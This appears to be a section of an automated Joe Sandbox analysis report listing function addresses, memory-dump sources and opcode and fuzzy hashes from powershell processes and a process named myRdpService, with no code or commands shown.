                                                                                    Similarity
                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                    • String ID:
                                                                                    • API String ID: 2933794660-0
                                                                                    • Opcode ID: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                    • Instruction ID: 07616f1fc036cf6ca0e642fb2886972376888a631fdbd341138a980f0d6c1c38
                                                                                    • Opcode Fuzzy Hash: 0f3f96051d0eb21c3945a3f0a1a11fbbf54d8e2d0602f5fb5ac0557b9058b17e
                                                                                    • Instruction Fuzzy Hash: ED114C26B14B068AFB009F60EC542B973A4FB5D758F841E71DA2D42BA8DF38D1948350

                                                                                    Executed Functions

                                                                                    Function 00007FFC44C97796 Relevance: .5, Instructions: 477COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3334271245.00007FFC44C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffc44c90000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 54b75396727be3032bad03f0567188aa5adcd5b0983a7540a19de547a2f9352b
                                                                                    • Instruction ID: 057636003c8c12d59b0d578fa1e1e7898b7543855f39e308bb460141ae2de996
                                                                                    • Opcode Fuzzy Hash: 54b75396727be3032bad03f0567188aa5adcd5b0983a7540a19de547a2f9352b
                                                                                    • Instruction Fuzzy Hash: 60F1843090DA4D8FEBA8EF28C8557E937D2FF54310F14426AE84EC7295DB34A945CB92
                                                                                    Function 00007FFC44C98542 Relevance: .5, Instructions: 463COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3334271245.00007FFC44C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffc44c90000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: db505cc6cc269fc4103ff1e45dcc5bd9f5cd1c222e07968734ad9eecb9275815
                                                                                    • Instruction ID: dbf26786e4c175ef63a268954faaf45bd3bb3ba0d34866be2ec325aa6c99328e
                                                                                    • Opcode Fuzzy Hash: db505cc6cc269fc4103ff1e45dcc5bd9f5cd1c222e07968734ad9eecb9275815
                                                                                    • Instruction Fuzzy Hash: B1E1B43051CA4D8FEBA8EF28C8957E977D2EF54310F14466EE84EC7295CB74A844CB92
                                                                                    Function 00007FFC44C98156 Relevance: .3, Instructions: 336COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3334271245.00007FFC44C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffc44c90000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 00182ece2f29befc536a83a302f37a0e90120f085942cd7a644486a770a28fb0
                                                                                    • Instruction ID: 8e48bfa489e0772d85ef98f02dff2b321e33cf357cec86424269fef1fc845252
                                                                                    • Opcode Fuzzy Hash: 00182ece2f29befc536a83a302f37a0e90120f085942cd7a644486a770a28fb0
                                                                                    • Instruction Fuzzy Hash: B9B1B43051CE4D4FEBA8EF28C8957E93BD1FF55310F14426AE84EC7296CA34A845CB92
                                                                                    Function 00007FFC44C97C54 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3334271245.00007FFC44C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffc44c90000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f619a37b0c567bdd95ade7816f18e17923ca5ef4b8800ed508696258e7ecbc34
                                                                                    • Instruction ID: 21ac25f2c7dde2343327c4940acb9ef64f9a5fe4b480c25de4c19dfc050c5907
                                                                                    • Opcode Fuzzy Hash: f619a37b0c567bdd95ade7816f18e17923ca5ef4b8800ed508696258e7ecbc34
                                                                                    • Instruction Fuzzy Hash: C631403085E56EDEFBB8EF14CC59BF83291FF41319F58053AD80E86186DA786985CB21
                                                                                    Function 00007FFC44C933B5 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000018.00000002.3334271245.00007FFC44C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C90000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_24_2_7ffc44c90000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
                                                                                    • Instruction ID: 08f7f256535374ef625d8263b50781b66b9773a92d2ba81f4b2ee23452409eea
                                                                                    • Opcode Fuzzy Hash: e26e880e1d71fe7436f510caca523963cd19ce89c1addea80b81cc1ac8720924
                                                                                    • Instruction Fuzzy Hash: AA01677115CB0C4FD744EF0CE491AA5B7E0FB99324F10056EE58AC3665DB36E892CB45

                                                                                    Executed Functions

                                                                                    Function 00007FFC44C5842D Relevance: 1.8, Strings: 1, Instructions: 560COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: 6b1a6c59f49cce42d74e02422e44ea6c2343ebc6b4c4e7467e31ae64449d2333
                                                                                    • Instruction ID: f06789dc2920b41f117d8cfeaebfa04cfd359215aabb139e9208a958f0e1e257
                                                                                    • Opcode Fuzzy Hash: 6b1a6c59f49cce42d74e02422e44ea6c2343ebc6b4c4e7467e31ae64449d2333
                                                                                    • Instruction Fuzzy Hash: CBE19C3090DAED4FE755EB2888915A93FD2EF52360F1805BBD848CB1D7CA38A816C371
                                                                                    Function 00007FFC44C5844D Relevance: 1.6, Strings: 1, Instructions: 386COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: @
                                                                                    • API String ID: 0-2766056989
                                                                                    • Opcode ID: fc95d6c157e3246b8493244d61ace376e19cdb94f0021f682193414ec01d2c97
                                                                                    • Instruction ID: 02a38f1ec1ffd5fc4904941c5deeb46de0a43cccec2783a88d84661a97667042
                                                                                    • Opcode Fuzzy Hash: fc95d6c157e3246b8493244d61ace376e19cdb94f0021f682193414ec01d2c97
                                                                                    • Instruction Fuzzy Hash: 7B916D3190DAAE4FEB55EA1884912BD7BD2FF51320F5805BAD849C718BDE38B816C371
                                                                                    Function 00007FFC44C56FED Relevance: .4, Instructions: 449COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 65941431833f7e788fa4472af65dad2619a857573a9da9c87b81cf7bc101349f
                                                                                    • Instruction ID: a9552852bdeb9cce5ca9dbbbe37ebaf1709faaced83218a7f6455b9f8c0c5c95
                                                                                    • Opcode Fuzzy Hash: 65941431833f7e788fa4472af65dad2619a857573a9da9c87b81cf7bc101349f
                                                                                    • Instruction Fuzzy Hash: 4DD10951A1E9AA4BEF55E27448A527D7FD2EF95320F2800BBC84DC71CBDC38A845C3A5
                                                                                    Function 00007FFC44C57030 Relevance: .4, Instructions: 417COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f80456fc483e980e9dc6709f77f31fc50b1289a8663fbacf581e35598ac9b06b
                                                                                    • Instruction ID: 60efde47cd6a735a99a1acce7c2fbc952bda0077125d392520940bc23ce49190
                                                                                    • Opcode Fuzzy Hash: f80456fc483e980e9dc6709f77f31fc50b1289a8663fbacf581e35598ac9b06b
                                                                                    • Instruction Fuzzy Hash: 4BD11911A1D96E4BEF55E67848952BD7AD2EF95320F2800BBC80DC71CBDC38AC45C3A5
                                                                                    Function 00007FFC44C57130 Relevance: .3, Instructions: 298COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 81bd29a054adeb2cd022aa5c35f4d2edf879085385ae6c2e800671d944ee39c5
                                                                                    • Instruction ID: 705c78be62a8bc95b820ad4a15c5c2fc97095a26a9079020b6bb4f3d7ae00426
                                                                                    • Opcode Fuzzy Hash: 81bd29a054adeb2cd022aa5c35f4d2edf879085385ae6c2e800671d944ee39c5
                                                                                    • Instruction Fuzzy Hash: D391B521E1DA2E4BEF58F63844A56BD7BD2EF54320F14057AD80EC71CADD38A885C7A1
                                                                                    Function 00007FFC44C57DCE Relevance: .2, Instructions: 207COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e436728c0f4880a7e8706beeb01a795c6cdfc10cf581fccc92e54e8df8a41bcf
                                                                                    • Instruction ID: f2912f02b59c00fd49c0ae1523fae0b8ab8b2db27b97c69dcc16cfed6ae29862
                                                                                    • Opcode Fuzzy Hash: e436728c0f4880a7e8706beeb01a795c6cdfc10cf581fccc92e54e8df8a41bcf
                                                                                    • Instruction Fuzzy Hash: C561E331908A2C8FDB68EB18C8857EDB7F1FF58310F0442ABD44DE3251DAB0A985CB91
                                                                                    Function 00007FFC44C5AC32 Relevance: .2, Instructions: 154COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6306c51e11a0626b33d1bd4422ce9507bc31b36e8f31a4b4a97b229b6407bdd6
                                                                                    • Instruction ID: cc2332f82ec7c53798614b4ab7676d9ca1e699f2e82d61a58bcbffe971b1dacb
                                                                                    • Opcode Fuzzy Hash: 6306c51e11a0626b33d1bd4422ce9507bc31b36e8f31a4b4a97b229b6407bdd6
                                                                                    • Instruction Fuzzy Hash: 4E41B031A1C92D4BDF59F62888956FDB7E2EFA8310F1405BAD40EC3186DE34B945CB91
                                                                                    Function 00007FFC44C57ED0 Relevance: .1, Instructions: 148COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7965f54f4ea6dc636bee90c266a860697f3ca30c56b7f727344aaf06f34271bf
                                                                                    • Instruction ID: 6f6b129b4cdbac6c40d69d33bc49dd8c097bf00512f8be5ab6154a8ac0f477f9
                                                                                    • Opcode Fuzzy Hash: 7965f54f4ea6dc636bee90c266a860697f3ca30c56b7f727344aaf06f34271bf
                                                                                    • Instruction Fuzzy Hash: FB41F83180CA6D8EEB64EB48D8807FDBBF1FF14320F14426BD40EA7645DA74A985CB94
                                                                                    Function 00007FFC44C57EEF Relevance: .1, Instructions: 128COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c5ef009b3991f669ed04d9767f3c8ba9bea131101f089db2c3ba3cb73d995682
                                                                                    • Instruction ID: 9bd453f3193e89cbc9dbdae0410caf1dde65c32680c481b9139154f2f0ebf7ee
                                                                                    • Opcode Fuzzy Hash: c5ef009b3991f669ed04d9767f3c8ba9bea131101f089db2c3ba3cb73d995682
                                                                                    • Instruction Fuzzy Hash: D1417531908A1D8FDF54EB48D881BEDB7B1FF64310F10429AC04EA7245DA74AAC5CF85
                                                                                    Function 00007FFC44C5B040 Relevance: .1, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bede4e2245108c142cfb5cf2f7b3a11556e540f08b857aa9bf4e04ab2a0bb869
                                                                                    • Instruction ID: d99f32cafb7b11fd6d422bf13be9ad6af17a3d12b2c24498c501b7e96b3fe838
                                                                                    • Opcode Fuzzy Hash: bede4e2245108c142cfb5cf2f7b3a11556e540f08b857aa9bf4e04ab2a0bb869
                                                                                    • Instruction Fuzzy Hash: D821947160C7998FD790EB68C48866ABBD1FB99310F144A7AE44CC32A5EB74D484C752
                                                                                    Function 00007FFC44C56700 Relevance: .0, Instructions: 50COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                    • Instruction ID: 43c5a7027e9bfa77ddb39371cf8696c765682080095f70f382eba684c9b01163
                                                                                    • Opcode Fuzzy Hash: c91f8bb5612940347ec11d1d9cf77a374b71f9ec13eb81fd806d63c7de80ac71
                                                                                    • Instruction Fuzzy Hash: 6601653090D52E8BDB65F674C895ABE7AF2EF51320F24013EE44E935D6DD342880C761
                                                                                    Function 00007FFC44C533B5 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8b53b10aa1f576f962940570b8e984fec58478a812c5ce4fb5b520f8331efbef
                                                                                    • Instruction ID: da9ae4f2287324d24610e0a511aacabeb8a61ec42f13c675d353f0b2626cc66b
                                                                                    • Opcode Fuzzy Hash: 8b53b10aa1f576f962940570b8e984fec58478a812c5ce4fb5b520f8331efbef
                                                                                    • Instruction Fuzzy Hash: 6201A73010CB0C4FD744EF0CE491AA5B7E0FB95320F10056EE58AC3261DA32E882CB41
                                                                                    Function 00007FFC44C56F81 Relevance: .0, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f7561ba3e8a5e1cff1690a2cb4dd3dd6fc3d8ab4dcca11468e762a40a11d8627
                                                                                    • Instruction ID: 40a2532f4c2444c1121f5e929569ab8264b82f1717a0c61b8192b6be356b1b8f
                                                                                    • Opcode Fuzzy Hash: f7561ba3e8a5e1cff1690a2cb4dd3dd6fc3d8ab4dcca11468e762a40a11d8627
                                                                                    • Instruction Fuzzy Hash: ED01202190DB994FD367D73884951A17FE0DF561203098AFBC08DCB5A7DD646885C362
                                                                                    Function 00007FFC44C56FA0 Relevance: .0, Instructions: 35COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: afa5fb8af112bfef4a027ccd512191f8a4bcfa22ccb0d42d46394d8a40b7c84e
                                                                                    • Instruction ID: 311b1f711268233baec8f20871b791f5e3c81ce6e7596054217cf36254c7b858
                                                                                    • Opcode Fuzzy Hash: afa5fb8af112bfef4a027ccd512191f8a4bcfa22ccb0d42d46394d8a40b7c84e
                                                                                    • Instruction Fuzzy Hash: 4AF0E230918E1D4FD769EB2C80811A6B6E1EF592203008A7BD04EC32AADE34B848C791
                                                                                    Function 00007FFC44C57040 Relevance: .0, Instructions: 29COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 84f80f7c770bddf601a138338637f23467e69f4071cec1b7aa5a07852bc277e9
                                                                                    • Instruction ID: a78a8161322fd496d8cb0d7be08811660fc8151d5b0e32bc600c34000270a6a2
                                                                                    • Opcode Fuzzy Hash: 84f80f7c770bddf601a138338637f23467e69f4071cec1b7aa5a07852bc277e9
                                                                                    • Instruction Fuzzy Hash: 95F0A78295FAE70FFB0A815C18241381ED29B92250B1D00F7C4444B1DF94689E4A8379
                                                                                    Function 00007FFC44C57140 Relevance: .0, Instructions: 7COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000001C.00000002.3323807376.00007FFC44C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C50000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_28_2_7ffc44c50000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 006a1dcd3bcc9d9b2dade13cfbfc4c96687dfe4983deec31c1f5420c6c67a769
                                                                                    • Instruction ID: c825b9772d6f8eaa2fc896ccdf6a80ff7c0ecd5934afec993a105135a89aac7f
                                                                                    • Opcode Fuzzy Hash: 006a1dcd3bcc9d9b2dade13cfbfc4c96687dfe4983deec31c1f5420c6c67a769
                                                                                    • Instruction Fuzzy Hash: 8CB0128784FBD30FD656991408540A91EA25B7620072D10F7C04A4B1DFD4A8DF46C37A

                                                                                    Non-executed Functions

                                                                                    Function 00007FF7A5CCDB00 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000002D.00000002.3843751420.00007FF7A5C11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7A5C10000, based on PE: true
                                                                                    • Associated: 0000002D.00000002.3843677899.00007FF7A5C10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3845244582.00007FF7A6116000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3845815946.00007FF7A62D8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3845815946.00007FF7A641C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3846962471.00007FF7A6670000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3847041804.00007FF7A6672000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3847041804.00007FF7A6690000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3847041804.00007FF7A6693000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3847041804.00007FF7A6695000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 0000002D.00000002.3847335727.00007FF7A6698000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_45_2_7ff7a5c10000_myRdpService.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                    • String ID:
                                                                                    • API String ID: 2933794660-0
                                                                                    • Opcode ID: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                    • Instruction ID: c6ad58f4e9bbbf2b62f8d16c2916f917564eda72a48b72fb388bc3dbcea385c7
                                                                                    • Opcode Fuzzy Hash: b66d8daab459609d726222c036090e22f93798fcae7550261880a99b86b28e2a
                                                                                    • Instruction Fuzzy Hash: 54118C22B06F018AEB409B60EC542A973A4FB08B59F841A34DA6D467A8DF3CD4948390

                                                                                    Executed Functions

                                                                                    Function 00007FFC44C833B5 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000002E.00000002.3833180911.00007FFC44C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_46_2_7ffc44c80000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d6ab1351f01921192a4484a8dc8bd2cd8c5e113e0c24d4ad837c7bbd034a6c60
                                                                                    • Instruction ID: 86a1ed96efee763cf6554021258900ce1e8cc584e0618dfeda831b6f98f2e792
                                                                                    • Opcode Fuzzy Hash: d6ab1351f01921192a4484a8dc8bd2cd8c5e113e0c24d4ad837c7bbd034a6c60
                                                                                    • Instruction Fuzzy Hash: 8C01677115CB0C4FD744EF0CE491AA5B7E0FB95324F10056EE58AC3665DA36E892CB45